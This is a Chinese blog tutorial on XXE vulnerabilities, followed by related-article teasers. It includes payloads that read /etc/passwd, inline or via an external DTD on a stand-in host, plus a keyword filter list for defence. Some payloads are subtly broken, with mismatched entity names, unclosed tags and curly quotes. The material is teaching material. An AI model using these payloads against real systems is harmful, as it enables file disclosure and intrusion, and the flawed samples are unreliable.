XXE漏洞的详解与利用

最新推荐文章于 2024-05-31 14:45:00 发布
最新推荐文章于 2024-05-31 14:45:00 发布
阅读量4.3k 收藏
点赞数
文章标签: xml 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56606020/article/details/123504232
版权

XXE漏洞详解

漏洞介绍:

如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞另外php版本大于5.4.45的默认不解析外部实体

XML:

设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很想HTML语言。但是XML和HTML有明显区别如下:

1.被设计用来传输和存储数据。

2.被设计用来显示数据。

XML结构:

 <?xml version="1.0" encoding="UTF-8"?>

<note>

<to>Tove</to>

<from>Jani</from>

<heading>Reminder</heading>

<body>Don't forget me this weekend!</body>

</note>

第一行XML的声明,第二行<note> 为根元素, 下面的to, from,heading和body 都是子元素

DTD实体

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

实体又分为一般实体和参数实体

1,一般实体的声明语法:<!ENTITY 实体名 "实体内容“>

引用实体的方式:&实体名;

2,参数实体只能在DTD中使用,参数实体的声明格式: <!ENTITY % 实体名 "实体内容“>

引用实体的方式:%实体名;

外部实体构建

直接通过DTD外部实体声明

<?xml version=”1.0”?>

<!DOCTYPE a [ <!ENTITY b SYSTEM “file:///etc/passwd”>

]>

<c>&a;<c>

通过DTD文档引入外部DTD文档,再引入外部实体声明

<?xml version=”1.0”?>

<!DOCTYPE a SYSTEM “https://123abc.com/evil.dtd”>

<c>&b;<c>

DTD文件内容:

 <!ENTITY b SYSTEM “file:///etc/passwd”>

通过DTD外部实体声明引入外部实体声明

<?xml version=”1.0”?>

<!DOCTYPE a [ <!ENTITY b SYSTEM “https://123abc.com/evil.dtd”>

]>

<c>&b;<c>

DTD文件内容:

 <!ENTITY b SYSTEM “file:///etc/passwd”>

XXE漏洞危害与防御

危害

  1. 读取系统文件;
  2. 执行系统命令;
  3. 探测内网端口;
  4. 攻击内部网络。

防御

方案一、使用开发语言提供的禁用外部实体的方法

方案二、过滤用户提交的XML数据

关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

1024zz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows文件读取 xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 620
XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~读取文件时有特殊符号在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读...
XXE漏洞详解 一文了解XXE漏洞
闵行小鱼塘
11-10 3602
本篇总结归纳XXE漏洞
XXE漏洞安全-全网最详细讲解】
最新发布
qq_44005305的博客
05-31 728
Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(externalentity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。其中最常见的一种攻击是利用DTD(Document Type。
XXE漏洞漏洞利用方法解析
weixin_43749601的博客
03-02 2413
XXEXML External Entity Injection)即XML外部实体类注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。 0x001 XML XML设计用来传送及携带数据信息,不用来表现或展示数据,HTML则用来表现数据,所以XML用途的焦点是它说明数据是什么,以
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1516
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE漏洞的攻防之路。XXEXML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
XXE漏洞简介
不怕死的假老练
09-05 2493
一、概述 XXE(XML External Entity Injection),即MXL外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站,发起dos攻击。 XXE漏洞触发的点出现在系统可以上传XML文件的位置,应用程序对XML输入进行解析时,没有对上传的XML文件内容进行过滤,没有禁止加载外部实体,导致攻击者可以构造一个恶意的XML文件进行上传。 二、基本概念 1.XML XML,即可扩展
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解
07-30
3. 内网探测:攻击者可以利用XXE漏洞探测内网中的服务和设备状态。 4. DoS攻击:通过大量请求外部资源,消耗服务器资源,导致服务不可用。 **三、XXE检测** 检测XXE漏洞通常分为白盒和黑盒两种方式: 1. **白盒**:...
XXE 原理漏洞详解.md
04-03
### XXE原理漏洞详解 #### 1. 什么是XXE漏洞XML External Entity Injection(简称XXE漏洞是指在应用程序处理XML数据时,由于未能正确禁用或限制XML外部实体的加载,使得攻击者能够通过恶意构造的XML文档注入...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
WEB安全之XXE实体注入漏洞.pdf
12-12
XXE漏洞详解XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它允许自定义标记并具有结构化的特点。在Web应用程序中,XML常用于数据交换和配置。然而,XML的这种灵活性也引入了安全...
第39天:WEB漏洞-XXE&XML利用检测绕过全解1
08-03
XXE漏洞详解XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
XXE漏洞介绍及利用
星落的博客
06-11 9906
XXE漏洞介绍 XXE全称为XML External Entity Injection即XMl外部实体注入漏洞XXE漏洞 XXE漏洞触发点往往是可以上传xmlwenjian的位置,没有对xml文件进行过滤,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害 XML介绍及用途 XMl被设计用来传输和存储数据。XML文档形成了一种树状结构,它从"根部"开始,然后扩展到"枝叶"。 XMl允许作者定义自己的标签和自己的文档结构。 XML.
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6470
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE漏洞介绍与XML概述
afei001
02-06 206
1.XXE漏洞介绍 XXEXML External Entity attack),全称是:XML外部实体攻击。 XXE漏洞:当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击网站、发起Dos攻击等危害。 2.XML介绍 XML指可扩展标记语言(Extensible Markup Language)。用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的...
xxe漏洞
JunDao73的博客
03-17 722
XXE(XML External Entity Injection) XML外部实体注入。XXE就是在可以解析XMLXML是一种类似于HTML的可扩展标记语言,是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言)的地方,在这种地方提交XML的恶意代码来执行。它一般可以做到,内网文件读取,端口扫描,内网程序攻击,任意命令执行等。 php版本大于5.4.45的默认不解析外部实体。这也就是为什么说xxe漏洞越来越少了的原因。 如何防御x
XXE漏洞学习及利用
qq_38352420的博客
06-30 417
XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 所以学习XXE漏.
什么是XXE漏洞
Ping_Pig的博客
08-12 3018
漏洞解释 XML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文件使其具体结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括XML声明,DTD文档类型定义,文档元素. 常见的XML语法结构如下所示 <?xml version="1.0"?>XML声明 <!DOCTY...
XXE漏洞基础及简单利用
m0re's blog
08-02 2140
本文目录前言XXE基础xxe概念XML基础知识实体引用:DTDXXE文件读取xxe-labXXE利用 前言 学习XXE,其实前段时间写过一篇关于XXE的,但是由于不可描述的原因,我那篇博客原稿没有了。再总结一次,这次做好了备份。 XXE基础 xxe概念 XXE漏洞全称XML External Entity Injection,也就是xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻
WebGoat8实验:XXE注入漏洞详解利用
XXE漏洞允许攻击者通过利用不安全的XML解析器来读取服务器上的文件、执行DoS攻击或者进行盲XXE攻击。本文档详细分析了WebGoat8中XXE注入的几个关键场景,包括文件读取、REST接口的攻击和DoS攻击策略。" 在WebGoat8...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值